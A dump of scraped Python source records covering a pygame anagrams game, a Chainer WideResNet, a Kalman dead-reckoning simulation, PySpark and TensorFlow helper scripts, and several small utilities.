self.graphics_to_update:\n self.playerwordsSurfObj_list = []\n\n size_words, self.y_gap_words = numwords_to_fontsize(len(self.playerwords_list))\n self.fontObj_words = pygame.font.Font(font_words, size_words)\n\n if self.who_took == 'self':\n new_word_i = self.playerwords_list.index(self.new_word)\n for i, word in enumerate(self.playerwords_list):\n if i == new_word_i:\n self.playerwordsSurfObj_list.append(self.fontObj_words.render(word, True, color_taken))\n else:\n self.playerwordsSurfObj_list.append(self.fontObj_words.render(word, True, color_words))\n else:\n for word in self.playerwords_list:\n self.playerwordsSurfObj_list.append(self.fontObj_words.render(word, True, color_words))\n\n if 'player2words' in self.graphics_to_update:\n self.player2wordsSurfObj_list = []\n\n size_opp_words, self.y_gap_opp_words = numwords_to_fontsize(len(self.player2words_list))\n self.fontObj_words = pygame.font.Font(font_words, size_opp_words)\n\n if self.who_took == 'opp':\n new_word_i = self.player2words_list.index(self.new_word)\n for i, word in enumerate(self.player2words_list):\n if i == new_word_i:\n self.player2wordsSurfObj_list.append(self.fontObj_words.render(word, True, color_taken))\n else:\n self.player2wordsSurfObj_list.append(self.fontObj_words.render(word, True, color_words))\n else:\n for word in self.player2words_list:\n self.player2wordsSurfObj_list.append(self.fontObj_words.render(word, True, color_words))\n\n if 'guess' in self.graphics_to_update:\n self.guessSurfObj = self.fontObj_guess.render('Take: ' + self.guess, True, color_guess)\n\n if 'status' in self.graphics_to_update:\n self.statusSurfObj = self.fontObj_status.render(self.status, True, color_status)\n\n self.graphics_to_update = []\n\n if time_check:\n end_time = time.time()\n self.time_dict['update_graphics'] = end_time - start_time\n\n def __display_text(self, SurfaceObj, x, y):\n textRectObj = SurfaceObj.get_rect()\n textRectObj.topleft = (x, y)\n DISPLAYSURF.blit(SurfaceObj, textRectObj)\n\n def __display_text_tiles(self, SurfaceObj, x, y):\n textRectObj = SurfaceObj.get_rect()\n textRectObj.center = (x, y)\n DISPLAYSURF.blit(SurfaceObj, textRectObj)\n\n def __can_take(self, take_dict):\n if not self.__superset(self.current, take_dict['used_tiles'], strict=False):\n return False\n elif not self.__superset(self.playerwords, take_dict['self_taken_words'], strict=False):\n return False\n elif not self.__superset(self.player2words, take_dict['opp_taken_words'], strict=False):\n return False\n else:\n return True\n\n def __reconcile_takes(self, dict1, dict2):\n combined_dict = {}\n for key in dict1:\n combined_dict[key] = dict1[key] + dict2[key]\n\n if not self.__superset(self.current, combined_dict['used_tiles'], strict=False):\n return False\n elif not self.__superset(self.playerwords, combined_dict['self_taken_words'], strict=False):\n return False\n elif not self.__superset(self.player2words, combined_dict['opp_taken_words'], strict=False):\n return False\n else:\n return True\n\n def __dict_supersedes(self, dict1, dict2):\n if not (dict1['self_taken_words'] == dict2['self_taken_words'] and dict1['opp_taken_words'] == dict2['opp_taken_words']):\n return None\n else:\n if self.__superset(dict1['new_word'], dict2['new_word'], strict=True):\n return 'one'\n elif self.__superset(dict2['new_word'], dict1['new_word'], strict=True):\n return 'two'\n else:\n return None\n\n def get_server_update(self):\n flip_waiting_recv = False\n\n if time_check:\n start_time = time.time()\n\n if time.time() - self.last_type > 0.2:\n # Get player 2 update\n print(\"Getting player 2 update!\")\n net_id_recv, self.seed_recv, self.last_update_recv, self.take_dict_recv, self.flip_dict_recv = self.parse_data(self.send_data())\n print(f\"Flip dict: {self.flip_dict_recv}\")\n\n if self.seed_recv < 1:\n print(\"No data...\")\n if self.mode == 'multiplayer':\n self.frozen = True\n\n # If 'waiting' mode and get a valid seed, player 2 has joined and you're ready to start multiplayer\n elif self.mode == 'waiting':\n self.mode = 'multiplayer'\n self.status = 'Player 2 joined. Starting multiplayer'\n self.graphics_to_update = self.graphics_to_update + ['status']\n else:\n self.frozen = False\n\n take_dict_recv = self.take_dict_recv\n\n if time_check:\n end_time = time.time()\n self.time_dict['send_parse'] = end_time - start_time\n\n if time_check:\n start_time = time.time()\n\n if not self.i_flipped and not self.flip_dict['flip_waiting'] and self.flip_dict_recv['flip_waiting']:\n self.flip_dict['flip_waiting'] = True\n self.flip_dict['flip_status'] = 'Ready...'\n self.flip_dict['scheduled_flip'] = self.flip_dict_recv['scheduled_flip']\n # if the scheduled flip time has already passed, there's a snafu, so flip\n print(\"Secondhand flip\")\n print(f\"Current time is {time.time()}\")\n print(f\"Gonna flip at {self.flip_dict['scheduled_flip']}\")\n if time.time() > self.flip_dict['scheduled_flip']:\n print(\"OOPS! Already flipped!!!\")\n self.flip()\n self.flip_dict['flip_waiting'] = False\n\n self.graphics_to_update = self.graphics_to_update + ['flip']\n self.last_update = self.last_update_recv\n\n if self.take_waiting and time.time() - self.take_waiting_time > 0.5:\n self.update_take('self', self.take_dict)\n self.take_waiting = False\n self.take_dict = self.__cleared_take_dict()\n self.last_update = time.time()\n\n # Check if other player has made a more recent update, meaning you would need to update your lists\n # Don't check for flips (because they are timed and independently done). Only check for takes\n # So in theory, the following should be triggered only if there's a take or a counter-update!\n if self.last_update_recv > self.last_update and not self.__is_cleared(self.take_dict_recv):\n if print_check:\n \"\"\"\n print(f\"Opponent's last update: {self.player2_last_update}\")\n print(f\"My last update: {self.last_update}\")\n print(f\"My take start time: {self.take_start_time}\")\n print(f\"Current: {self.current}\")\n print(f\"Tiles used from opponent: {used_tiles_recv}\")\n print(f\"Tiles used by me: {self.take_dict['used_tiles']}\")\n \"\"\"\n\n \"\"\"\n If opp last update more recent, get opp take dict\n - if not waiting, check if can take\n - if yes, great!\n - if no, earlier take wins, update_take that one\n - if i win, set last update to my time\n - if i lose, SNAFU: apologize and backtrack\n - if waiting, reconcile take dicts\n - if compatible, update_take both\n - if one supersedes the other, take that one\n - else earlier take wins, update_take that one\n - if i win, set last update to my time\n - no matter what, self.take_waiting = False\n \"\"\"\n\n if not self.take_waiting:\n if self.__can_take(take_dict_recv):\n self.update_take('opp', take_dict_recv)\n elif self.__dict_supersedes(self.take_dict_past, take_dict_recv) == 'two':\n new_dict = {}\n new_dict['new_word'] = take_dict_recv['new_word']\n new_dict['etyms_new_word'] = take_dict_recv['etyms_new_word']\n new_dict['take_time'] = take_dict_recv['take_time']\n new_dict['used_tiles'] = self.__subtract(take_dict_recv['used_tiles'] , self.take_dict_past['used_tiles'])\n new_dict['self_taken_words'] = self.take_dict_past['new_word']\n new_dict['opp_taken_words'] = []\n new_dict['self_taken_is'] = [self.playerwords.index(self.take_dict_past['new_word'])]\n new_dict['opp_taken_is'] = []\n\n self.update_take('opp', new_dict)\n elif self.take_dict_past['take_time'] < take_dict_recv['take_time']:\n self.last_update = time.time()\n else:\n print('SNAFU')\n self.status = 'SNAFU'\n self.graphics_to_update = self.graphics_to_update + ['status']\n\n # BACKTRACK\n\n self.tiles = self.tiles_past.copy()\n self.current = self.current_past.copy()\n self.playerwords = self.playerwords_past.copy()\n self.playerwords_list = self.playerwords_list_past.copy()\n self.player2words = self.player2words_past.copy()\n self.player2words_list = self.player2words_list_past.copy()\n\n self.update_take('opp', take_dict_recv)\n else:\n who_supersedes = self.__dict_supersedes(self.take_dict, take_dict_recv)\n if self.__reconcile_takes(self.take_dict, take_dict_recv):\n self.update_take('opp', take_dict_recv)\n self.update_take('self', self.take_dict)\n\n self.last_update = time.time()\n self.take_dict = self.__cleared_take_dict()\n elif who_supersedes == 'one':\n self.update_take('self', self.take_dict)\n self.last_update = time.time()\n self.take_dict = self.__cleared_take_dict()\n elif who_supersedes == 'two':\n self.update_take('opp', take_dict_recv)\n self.take_dict = self.__cleared_take_dict()\n elif self.take_dict['take_time'] <= take_dict_recv['take_time']:\n self.update_take('self', self.take_dict)\n self.last_update = time.time()\n self.take_dict = self.__cleared_take_dict()\n else:\n self.update_take('opp', take_dict_recv)\n self.take_dict = self.__cleared_take_dict()\n\n self.take_waiting = False\n\n if time_check:\n end_time = time.time()\n self.time_dict['update_players'] = end_time - start_time\n\n def printstatus(self):\n if time_check:\n start_time = time.time()\n\n # 'CURRENT'\n\n self.__display_text(self.currentSurfObj, x_current, y_current)\n\n # CURRENT TILES\n\n y_tile = y_tile_0\n x_tile = x_tile_0\n\n for i, tile in enumerate(self.tilesSurfObj_list):\n x_tile = x_tile + self.x_gap_tile\n\n self.__display_text_tiles(tile, x_tile, y_tile)\n\n if i % 20 == 19:\n y_tile = y_tile + self.y_gap_tile\n x_tile = x_tile_0\n\n # 'YOUR'\n\n self.__display_text(self.yourSurfObj, x_your, y_your)\n\n # YOUR WORDS\n\n x_words_local = x_words\n y_words_local = y_words\n\n for i, word in enumerate(self.playerwordsSurfObj_list):\n self.__display_text(word, x_words_local, y_words_local)\n\n if i % 10 == 9:\n x_words_local = x_words_local + x_gap_words\n y_words_local = y_words - self.y_gap_words\n\n y_words_local = y_words_local + self.y_gap_words\n\n # GUESS\n self.__display_text(self.guessSurfObj, x_guess, y_guess)\n\n if self.mode != 'solo':\n # 'OPPONENT'S'\n self.__display_text(self.oppSurfObj, x_opp, y_opp)\n\n # OPPONENT'S WORDS\n\n x_opp_words_local = x_opp_words\n y_opp_words_local = y_opp_words\n\n for i, word in enumerate(self.player2wordsSurfObj_list):\n self.__display_text(word, x_opp_words_local, y_opp_words_local)\n\n if i % 10 == 9:\n x_opp_words_local = x_opp_words_local + x_gap_opp_words\n y_opp_words_local = y_opp_words - self.y_gap_opp_words\n\n y_opp_words_local = y_opp_words_local + self.y_gap_opp_words\n\n # FLIP STATUS\n self.__display_text(self.flipSurfObj, x_flip, y_flip)\n\n # STATUS\n self.__display_text(self.statusSurfObj, x_status, y_status)\n\n if time_check:\n end_time = time.time()\n self.time_dict['display_graphics'] = end_time - start_time\n\ndef main():\n # Main game loop\n global FPSCLOCK, DISPLAYSURF\n pygame.init()\n\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n\n pygame.display.set_caption('Anagrams')\n\n game = banana()\n\n while True: # main game loop\n FPSCLOCK.tick(60)\n\n if time_check:\n start_loop = time.time()\n\n DISPLAYSURF.fill(BGCOLOR)\n\n if game.flip_dict['flip_waiting']:\n if time.time() >= game.flip_dict['scheduled_flip']:\n # print(\"Firsthand flip\")\n game.flip()\n game.flip_dict['flip_waiting'] = False\n\n for event in pygame.event.get():\n\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if game.frozen:\n game.status = 'Oops! Connection problem! Reconnecting...'\n game.graphics_to_update = game.graphics_to_update + ['status']\n\n elif not game.tiles and time.time() - game.last_update > 3:\n game.status = f\"No more tiles! Your score: {sum([len(i) for i in game.playerwords_list])}, Opponent's score: {sum([len(i) for i in game.player2words_list])}\"\n game.graphics_to_update = game.graphics_to_update + ['status']\n\n elif game.mode == 'waiting':\n if event.type == KEYDOWN and event.key == K_RETURN:\n game.mode = 'solo'\n game.status = 'Now playing solo'\n game.graphics_to_update = game.graphics_to_update + ['status']\n else:\n game.status = 'Waiting for other player... Press Enter to play solo'\n game.graphics_to_update = game.graphics_to_update + ['status']\n\n elif event.type == KEYDOWN:\n if event.key == K_BACKSPACE:\n if game.guess == '':\n pass\n else:\n # Delete one letter from the guess\n game.guess = game.guess[:-1]\n game.graphics_to_update = game.graphics_to_update + ['guess']\n game.last_type = time.time()\n\n elif event.key == K_SPACE:\n # Don't do anything if input is a space\n pass\n\n elif event.key == K_RETURN:\n # if Return and no guess is present, then flip next tile. If guess is present, see if it's a take\n if game.guess == '':\n if game.mode != 'solo':\n game.flip_dict['flip_waiting'] = True\n game.flip_dict['flip_status'] = 'Ready...'\n game.graphics_to_update = game.graphics_to_update + ['flip']\n game.last_update = time.time()\n game.flip_dict['scheduled_flip'] = time.time() + 1\n game.i_flipped = True\n\n print(\"Firsthand flip\")\n print(f\"Current time is {time.time()}\")\n print(f\"Gonna flip at {game.flip_dict['scheduled_flip']}\")\n else:\n game.flip()\n\n else:\n game.take(game.guess.upper())\n\n elif event.key in letter_keys:\n # if letter is typed then add it to the current guess\n game.guess = game.guess + event.unicode.upper()\n game.graphics_to_update = game.graphics_to_update + ['guess']\n game.last_type = time.time()\n\n if game.mode != 'solo':\n game.get_server_update()\n\n if game.i_flipped and game.flip_dict['flip_waiting']:\n game.flip_dict['flip_waiting'] = False\n game.i_flipped = False\n\n game.update_graphics()\n game.printstatus()\n pygame.display.update()\n\n if time_check:\n end_loop = time.time()\n loop_time = end_loop - start_loop\n game.time_dict['loop'] = loop_time\n\n if loop_time > 0.1:\n print(f\"Delay: {game.time_dict}\")\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","sub_path":"anagrams_network7_new.py","file_name":"anagrams_network7_new.py","file_ext":"py","file_size_in_byte":42941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"386336680","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/apgl/generator/test/BarabasiAlbertGeneratorTest.py\n# Compiled at: 2011-05-06 16:11:42\nimport unittest, logging\nfrom apgl.generator.BarabasiAlbertGenerator import BarabasiAlbertGenerator\nfrom apgl.graph.VertexList import VertexList\nfrom apgl.graph.SparseGraph import SparseGraph\n\nclass BarabasiAlbertGeneratorTest(unittest.TestCase):\n\n def testGenerate(self):\n numFeatures = 1\n numVertices = 20\n vList = VertexList(numVertices, numFeatures)\n graph = SparseGraph(vList)\n ell = 2\n m = 0\n generator = BarabasiAlbertGenerator(ell, m)\n graph = generator.generate(graph)\n self.assertEquals(graph.getNumEdges(), 0)\n ell = 5\n graph.removeAllEdges()\n generator.setEll(ell)\n graph = generator.generate(graph)\n self.assertEquals(graph.getNumEdges(), 0)\n ell = 2\n m = 1\n graph.removeAllEdges()\n generator.setEll(ell)\n generator.setM(m)\n graph = generator.generate(graph)\n self.assertEquals(graph.getNumEdges(), (numVertices - ell) * m)\n m = 2\n graph.removeAllEdges()\n generator.setM(m)\n graph = generator.generate(graph)\n self.assertEquals(graph.getNumEdges(), (numVertices - ell) * m)\n\n def testGraphDisplay(self):\n try:\n import networkx, matplotlib\n except ImportError as error:\n logging.debug(error)\n return\n\n numFeatures = 1\n numVertices = 20\n vList = VertexList(numVertices, numFeatures)\n graph = SparseGraph(vList)\n ell = 2\n m = 2\n generator = BarabasiAlbertGenerator(ell, m)\n graph = generator.generate(graph)\n logging.debug(graph.degreeDistribution())\n nxGraph = graph.toNetworkXGraph()\n nodePositions = networkx.spring_layout(nxGraph)\n nodesAndEdges = networkx.draw_networkx(nxGraph, pos=nodePositions)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pycfiles/apgsa-0.0.3-py3-none-any/BarabasiAlbertGeneratorTest.py","file_name":"BarabasiAlbertGeneratorTest.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"218795365","text":"import re\n\nREGEX_DOMAIN = re.compile(r'(https{0,1}:\\/\\/[a-zA-Z0-9.]{1,})')\nREGEX_HTTP_S = re.compile(r'https{0,1}:\\/\\/')\nREMOVE_NL = re.compile(r'\\n{0,}')\n\n\ndef get_domain(url):\n \"\"\" Получает домен через URL. \"\"\"\n return REGEX_DOMAIN.findall(url)[0]\n\n\ndef get_path_by_url(url):\n url = REMOVE_NL.sub('', url)\n path = REGEX_HTTP_S.sub('', url)\n if path[-1] == '/':\n path = path[:-1]\n lastWord = path.split('/')[-1]\n newLaswWord = ''\n if '.' in lastWord:\n newLaswWord = lastWord.split('.')[0] + '.txt'\n else:\n newLaswWord = lastWord + '.txt'\n \n return path.replace(lastWord, ''), newLaswWord\n\n\ndef find_argument(key: str, arguments: list):\n \"\"\" Поиск аргумента по ключу \"\"\"\n for argument in arguments:\n if f'--{key}' in argument and '=' in argument:\n return argument.split('=')[1]\n return None","sub_path":"Dependencies/handler_funcs.py","file_name":"handler_funcs.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"319011871","text":"from pyspark.sql import SparkSession\n\ndef get_spark_session(execution_mode):\n \"\"\"\n Creating SparkSession object\n :param execution_mode:\n :return:\n \"\"\"\n spark_session = SparkSession.builder.appName(\"HelloFreshRecipes\").master(execution_mode).enableHiveSupport().getOrCreate()\n return spark_session\n\ndef get_config(spark_session,config):\n \"\"\"\n Initialize parameters from props file\n :param spark_session:\n :param config:\n :return:\n \"\"\"\n\n hadoop_conf= spark_session._jsc.hadoopConfiguration()\n hadoop_conf.set(\"com.amazonaws.services.s3.enableV4\", \"true\")\n aws_profile = config.get(\"aws_profile\")\n aws_region = config.get(\"aws_region\")\n s3_bucket = config.get(\"s3_bucket\")\n access_id = config.get(aws_profile, \"aws_access_key_id\")\n access_key = config.get(aws_profile, \"aws_secret_access_key\")\n\n return(aws_profile,aws_region,s3_bucket,access_id,access_key)\n\ndef get_logger(spark_session):\n log4j = spark_session._jvm.org.apache.log4j\n logger = log4j.LogManager.getLogger(__name__)\n return logger","sub_path":"recipes-etl/src/main/python/utils/SparkConfigProvider.py","file_name":"SparkConfigProvider.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"443334429","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nfrom roblib import *\n\ndef dreadreckoning2(lim=50, tempsLim=50, dt=0.01):\n \n\n x = array([[0],\n [0],\n [0],\n [6],\n [0.1]\n ])\n\n def f(x,u): \n xdot= array([x[3] * cos(x[4]) * cos(x[2]),\n x[3] * cos(x[4]) * sin(x[2]),\n x[3] * sin(x[4]) / 3,\n u[0],\n u[1]\n ])\n return xdot\n \n zhat = array([x[0],x[1],x[3]])\n Gzhat = zeros((3,3))\n Galphaz = dt* diag([0.02, 0.02, 0.06])\n Galphax = dt* diag([0, 0, 0.02, 0.02, 0.06])\n \n\n for t in arange(0, tempsLim, dt):\n cla()\n alphax = mvnrnd2(array([0,0,0,0,0]),Galphax)\n ux = array([[0],[0]])\n\n# Euler\n# x = x + f(x,ux) * dt + alphax\n \n# Runge-Kutta\n tempX = x + (2/3) * dt * f(x, ux)\n tempU = (2/3) * dt * ux\n x = x + dt * (0.25 * f(x, ux) + (3/4) * f(tempX, tempU)) + alphax\n \n uz = array([[0],\n [0],\n [dt* ux[0]]\n ])\n \n Ak = array([[1, 0, cos(x[4]) * cos(x[2])],\n [0, 1, cos(x[4]) * sin(x[2])],\n [0, 0, 1]\n ])\n \n y = x[3] + mvnrnd2(array([0]), 0.1 * eye(1))\n C = array([[0,0,1]])\n Gbeta = 0.01\n \n zhat,Gzhat= kalman(zhat,Gzhat,uz,y,Galphaz,Gbeta,Ak,C)\n \n draw_ellipse(x[0:2], Gzhat[0:2, 0:2], 0.9, ax, 'r')\n draw_car(x)\n ax.set_xlim(-lim,lim)\n ax.set_ylim(-lim,lim)\n pause(0.01)\n\nplt.close(\"all\")\nfig = plt.figure(\"Deadreckoning2\")\nax = fig.add_subplot(1, 1, 1)\nplt.show()\ndreadreckoning()\n","sub_path":"python/Eval/Eval22.py","file_name":"Eval22.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"49727714","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer.initializers import normal\nimport collections\nfrom .pgp_lib import pgp\n\n\nclass PreBuildingBasicBlock(chainer.link.Chain):\n\n \"\"\"A building block that consists of several Basic layers.\n\n Args:\n n_layer (int): Number of layers used in the building block.\n in_channels (int): Number of channels of input arrays.\n out_channels (int): Number of channels of output arrays.\n stride (int or tuple of ints): Stride of filter application.\n initialW (4-D array): Initial weight value used in\n the convolutional layers.\n \"\"\"\n\n def __init__(self, n_layer, in_channels,\n out_channels, stride, initialW=None):\n super(PreBuildingBasicBlock, self).__init__()\n with self.init_scope():\n self.a = PreBasicA(in_channels, out_channels, stride, initialW)\n self._forward = [\"a\"]\n for i in range(n_layer - 1):\n name = 'b{}'.format(i + 1)\n basic = PreBasicB(out_channels, initialW)\n setattr(self, name, basic)\n self._forward.append(name)\n\n def __call__(self, x):\n for name in self._forward:\n layer = getattr(self, name)\n x = layer(x)\n return x\n\n @property\n def forward(self):\n return [getattr(self, name) for name in self._forward]\n\n\nclass PreBasicA(chainer.link.Chain):\n\n def __init__(self, in_channels, out_channels, stride=2, initialW=None):\n super(PreBasicA, self).__init__()\n\n self.stride = stride\n with self.init_scope():\n self.bn1 = L.BatchNormalization(in_channels)\n self.conv1 = L.Convolution2D(\n in_channels, out_channels, 3, 1, 1, initialW=initialW,\n nobias=True)\n self.bn2 = L.BatchNormalization(out_channels)\n self.conv2 = L.Convolution2D(\n out_channels, out_channels, 3, 1, 1, initialW=initialW,\n nobias=True)\n self.conv3 = L.Convolution2D(\n in_channels, out_channels, 1, 1, 0, initialW=initialW,\n nobias=True)\n\n def __call__(self, x):\n h0 = F.relu(self.bn1(x))\n h1 = self.conv1(h0)\n if self.stride == 2:\n h1 = self.conv2(F.dropout(pgp(F.relu(self.bn2(h1)), 2), 0.3))\n h2 = self.conv3(pgp(h0, 2))\n else:\n h1 = self.conv2(F.dropout(F.relu(self.bn2(h1)), 0.3))\n h2 = self.conv3(h0)\n return h1 + h2\n\n\nclass PreBasicB(chainer.link.Chain):\n\n def __init__(self, in_channels, initialW=None):\n super(PreBasicB, self).__init__()\n with self.init_scope():\n self.bn1 = L.BatchNormalization(in_channels)\n self.conv1 = L.Convolution2D(\n in_channels, in_channels, 3, 1, 1, initialW=initialW,\n nobias=True)\n self.bn2 = L.BatchNormalization(in_channels)\n self.conv2 = L.Convolution2D(\n in_channels, in_channels, 3, 1, 1, initialW=initialW,\n nobias=True)\n\n def __call__(self, x):\n h = self.conv1(F.relu(self.bn1(x)))\n h = self.conv2(F.dropout(F.relu(self.bn2(h)), 0.3))\n return h + x\n\n\nclass WideResNet_PGP(chainer.Chain):\n\n def __init__(self, n_layers, n_out, k=1, layer_names=None):\n super().__init__()\n kwargs = {'initialW': normal.HeNormal(scale=1.0)}\n\n if (n_layers - 4) % 6 == 0:\n block = [(n_layers - 4) // 6] * 3\n else:\n raise ValueError(\n 'The n_layers argument should be mod({} - 4, 6) == 0, \\\n but {} was given.'.format(n_layers, n_layers))\n\n with self.init_scope():\n self.conv1 = L.Convolution2D(3, 16, 3, 1, 1, **kwargs)\n self.res2 = PreBuildingBasicBlock(\n block[0], 16, 16 * k, 1, **kwargs)\n self.res3 = PreBuildingBasicBlock(\n block[1], 16 * k, 32 * k, 2, **kwargs)\n self.res4 = PreBuildingBasicBlock(\n block[2], 32 * k, 64 * k, 2, **kwargs)\n self.bn4 = L.BatchNormalization(64 * k)\n self.fc5 = L.Linear(64 * k, n_out)\n\n self.functions = collections.OrderedDict([\n ('conv1', [self.conv1]),\n ('res2', [self.res2]),\n ('res3', [self.res3]),\n ('res4', [self.res4]),\n ('pool4', [self.bn4, F.relu, lambda x: F.average(x, axis=(2, 3))]),\n ('fc5', [self.fc5]),\n ])\n\n if layer_names is None:\n layer_names = list(self.functions.keys())[-1]\n if (not isinstance(layer_names, str) and\n all([isinstance(name, str) for name in layer_names])):\n return_tuple = True\n else:\n return_tuple = False\n layer_names = [layer_names]\n self._return_tuple = return_tuple\n self._layer_names = layer_names\n\n def __call__(self, x):\n h = x\n\n activations = dict()\n target_layers = set(self._layer_names)\n for key, funcs in self.functions.items():\n if len(target_layers) == 0:\n break\n for func in funcs:\n h = func(h)\n if key in target_layers:\n activations[key] = h\n target_layers.remove(key)\n\n if self._return_tuple:\n activations = tuple(\n [activations[name] for name in self._layer_names])\n else:\n activations = list(activations.values())[0]\n return activations\n\n def extract(self, images, layers=['fc5']):\n self._layer_names = layers\n x = chainer.Variable(self.xp.asarray(images))\n h = self(x).data\n _len, _cls = h.shape\n h = F.average(F.reshape(h, (16, _len // 16, _cls)), axis=0)\n return chainer.cuda.to_cpu(h.data)\n","sub_path":"models/wideresnet_pgp.py","file_name":"wideresnet_pgp.py","file_ext":"py","file_size_in_byte":5934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"559736493","text":"def distance(strand_a, strand_b):\n if len(strand_a) != len(strand_b):\n raise ValueError('Sequences must be of same length.')\n\n distance = 0\n\n for i, c in enumerate(strand_a):\n if c != strand_b[i]:\n distance += 1\n\n return distance","sub_path":"hamming/hamming.py","file_name":"hamming.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"299027454","text":"from __future__ import division, print_function\nimport cv2\nimport platform\nimport os\n\n\ndef videoWrite(frames, fname='out.mp4', fps=30):\n shape = frames[0].shape\n \n frame_height, frame_width = shape[:2]\n \n # video writer doesn't like grayscale images, have\n # to convert to RGB\n if len(shape) == 2:\n grayscale = True\n else:\n grayscale = False\n \n # pick a good encoder for the current OS\n sys = platform.system().lower()\n if sys in ['darwin']:\n fourcc = 'avc1'\n else:\n fourcc = 'mjpg'\n \n print('>> Saving {} {}x{} images to {}'.format(len(imgs), shape[1], shape[0], fname))\n print('>> using {} on {}'.format(fourcc, sys))\n \n # create the video writer and write all frames to the file\n out = cv2.VideoWriter(\n fname,\n cv2.VideoWriter_fourcc(*fourcc), \n fps, \n (frame_width,frame_height))\n \n for frame in frames:\n # convert if necessary to RGB\n if grayscale:\n frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2RGB)\n out.write(frame)\n \n out.release()\n print('>> wrote {:.1f} MB'.format(os.path.getsize(fname)/(1E6)))\n","sub_path":"opencvutils/video_write.py","file_name":"video_write.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"316382117","text":"class MedianFinder(object):\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.odd = False\n self.mid = -1\n self.array = []\n\n def addNum(self, num):\n \"\"\"\n :type num: int\n :rtype: None\n \"\"\"\n self.array.append(num)\n self.odd = bool(1 - self.odd)\n if self.odd:\n self.mid += 1\n\n def findMedian(self):\n \"\"\"\n :rtype: float\n \"\"\"\n if self.odd:\n return self.array[self.mid]\n else:\n return (self.array[self.mid] + self.array[self.mid + 1]) / float(2)\n\n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()\nmedianFinder = MedianFinder()\nmedianFinder.addNum(1)\nmedianFinder.addNum(2)\nprint(medianFinder.findMedian())\n","sub_path":"findKthLargest.py","file_name":"findKthLargest.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"604872640","text":"import os\nfrom scripts.label_image import *\nimport pandas as pd\n\nPROJECT_PATH = \"D:\\\\00_work\\\\data\\\\kaggle datasets\\\\DR\\\\\"\n\ndef cal_accuracy(file_list, top_dict, class_no=2):\n df = pd.read_csv(PROJECT_PATH+'trainLabels.csv')\n correct = 0\n num = len(file_list)\n for f in file_list:\n idx = f[0:len(f)-5]\n if class_no == 2:\n correct_label = int(df[df.image == idx].level.values>0)\n \n if correct_label == top_dict[idx]:\n correct+=1\n \n print('CORRECT {0}'.format(correct))\n return correct/num\n \nif __name__ == \"__main__\":\n test_path = PROJECT_PATH + 'test\\\\'\n file_list = os.listdir(test_path)\n file_name = test_path + file_list[0]\n model_file = \"tf_files/retrained_graph.pb\"\n label_file = \"tf_files/retrained_labels.txt\"\n input_height = 224\n input_width = 224\n #input_mean = 128\n #input_std = 128\n input_mean = 127.5\n input_std = 127.5\n input_layer = \"input\"\n output_layer = \"final_result\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image\", help=\"image to be processed\")\n parser.add_argument(\"--graph\", help=\"graph/model to be executed\")\n parser.add_argument(\"--labels\", help=\"name of file containing labels\")\n parser.add_argument(\"--input_height\", type=int, help=\"input height\")\n parser.add_argument(\"--input_width\", type=int, help=\"input width\")\n parser.add_argument(\"--input_mean\", type=int, help=\"input mean\")\n parser.add_argument(\"--input_std\", type=int, help=\"input std\")\n parser.add_argument(\"--input_layer\", help=\"name of input layer\")\n parser.add_argument(\"--output_layer\", help=\"name of output layer\")\n args = parser.parse_args()\n\n if args.graph:\n model_file = args.graph\n if args.image:\n file_name = args.image\n if args.labels:\n label_file = args.labels\n if args.input_height:\n input_height = args.input_height\n if args.input_width:\n input_width = args.input_width\n if args.input_mean:\n input_mean = args.input_mean\n if args.input_std:\n input_std = args.input_std\n if args.input_layer:\n input_layer = args.input_layer\n if args.output_layer:\n output_layer = args.output_layer\n \n key_list = []\n value_list = []\n graph = load_graph(model_file)\n labels = load_labels(label_file)\n input_name = \"import/\" + input_layer\n output_name = \"import/\" + output_layer\n input_operation = graph.get_operation_by_name(input_name);\n output_operation = graph.get_operation_by_name(output_name);\n count = 0\n num = len(file_list)\n\n for f in file_list:\n src = test_path + f\n t = read_tensor_from_image_file(src,\n input_height=input_height,\n input_width=input_width,\n input_mean=input_mean,\n input_std=input_std)\n\n\n with tf.Session(graph=graph) as sess:\n results = sess.run(output_operation.outputs[0],\n {input_operation.outputs[0]: t})\n \n results = np.squeeze(results)\n top_k = results.argsort()[-5:][::-1]\n key_list.append(f[0:(len(f)-5)]) \n value_list.append(int(labels[list(results).index(max(results))]))\n \n count+=1\n if count%20 == 0:\n print(\"Done {0}/{1}\".format(count, num))\n \n top_dict = dict(zip(key_list, value_list))\n 